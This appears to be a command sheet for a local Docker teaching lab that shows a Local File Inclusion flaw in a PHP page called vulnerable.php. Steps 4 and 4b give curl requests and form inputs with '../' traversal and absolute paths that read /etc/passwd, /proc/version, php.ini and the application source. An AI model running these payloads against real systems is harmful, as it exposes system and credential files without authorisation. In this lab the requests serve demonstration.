===========================================
LFI Demo - Exact Commands for Reproduction
===========================================

This file contains the exact commands you should type to reproduce the LFI vulnerability demonstration.

STEP 1: Build and Start the Container
--------------------------------------
docker compose up --build

(Wait for the container to start. You should see "Apache/2.x.x (Unix) Server" messages.)

STEP 2: Test the Homepage
--------------------------
curl http://127.0.0.1:8080/

STEP 3: View Safe Pages (Normal Usage)
---------------------------------------
curl http://127.0.0.1:8080/vulnerable.php?page=about.php
curl http://127.0.0.1:8080/vulnerable.php?page=contact.php
curl http://127.0.0.1:8080/vulnerable.php?page=help.php

STEP 4: Demonstrate Path Traversal (LFI Attack)
------------------------------------------------
# Read README_FILES.txt directly (no traversal needed)
curl "http://127.0.0.1:8080/vulnerable.php?page=README_FILES.txt"

# Read application source code using path traversal (go up one level from includes/)
curl "http://127.0.0.1:8080/vulnerable.php?page=../index.php"
curl "http://127.0.0.1:8080/vulnerable.php?page=../vulnerable.php"

# Note: ../../templates/includes/README_FILES.txt won't work because the container
# structure is flat (no templates/ directory). Files are at /var/www/html/

STEP 4b: Read Container/System Files (DEMO ONLY)
-------------------------------------------------
# WARNING: These commands demonstrate reading container system files
# This is for educational purposes only to show the severity of LFI

# Read container's /etc/passwd file
curl "http://127.0.0.1:8080/vulnerable.php?page=/etc/passwd"

# Read container hostname
curl "http://127.0.0.1:8080/vulnerable.php?page=/etc/hostname"

# Read kernel version information
curl "http://127.0.0.1:8080/vulnerable.php?page=/proc/version"

# Read OS release information
curl "http://127.0.0.1:8080/vulnerable.php?page=/etc/os-release"

# Read PHP configuration (if accessible)
curl "http://127.0.0.1:8080/vulnerable.php?page=/usr/local/etc/php/php.ini"

# Read application source code using path traversal (go up one level from includes/)
curl "http://127.0.0.1:8080/vulnerable.php?page=../index.php"
curl "http://127.0.0.1:8080/vulnerable.php?page=../vulnerable.php"

# Access system files using relative path traversal (go up from includes/, then up from web root)
curl "http://127.0.0.1:8080/vulnerable.php?page=../../etc/passwd"

STEP 5: Test Error Handling
----------------------------
# Try a non-existent file
curl "http://127.0.0.1:8080/vulnerable.php?page=nonexistent.php"

# Try with no parameter
curl "http://127.0.0.1:8080/vulnerable.php"

# Try with empty parameter
curl "http://127.0.0.1:8080/vulnerable.php?page="

STEP 6: Browser-Based Testing (Alternative)
--------------------------------------------
Open your browser and navigate to:
  http://127.0.0.1:8080

Then try:
  1. Click on the "About", "Contact", or "Help" links
  2. Use the form to enter: about.php
  3. Use the form to enter: README_FILES.txt
  4. Use the form to enter: ../index.php (path traversal to access homepage source)
  5. Use the form to enter: ../vulnerable.php (path traversal to access handler source)
  6. DEMO ONLY - Use the form to enter: /etc/passwd
  7. DEMO ONLY - Use the form to enter: /etc/hostname
  8. DEMO ONLY - Use the form to enter: /proc/version
  9. Use the form to enter: nonexistent.php

STEP 7: Stop the Container
---------------------------
docker compose down

===========================================
Notes:
- All commands should be typed exactly as shown
- The quotes around URLs with special characters are important
- The container must be running (from Step 1) for Steps 2-5 to work
- Browser testing (Step 6) is optional but recommended for visual demonstration
- Steps 4b demonstrate reading container system files (DEMO ONLY)
- These commands show the full severity of LFI vulnerabilities
- The container is isolated and cannot access host system files
- Container structure: Files are at /var/www/html/ (web root) and /var/www/html/includes/
- Path traversal: Use ../ to go up one level from includes/ to access web root files
- Use ../../ to go up two levels (from includes/ to /var/www/) to access system files
- The templates/ directory doesn't exist in the container (files are copied directly)
===========================================

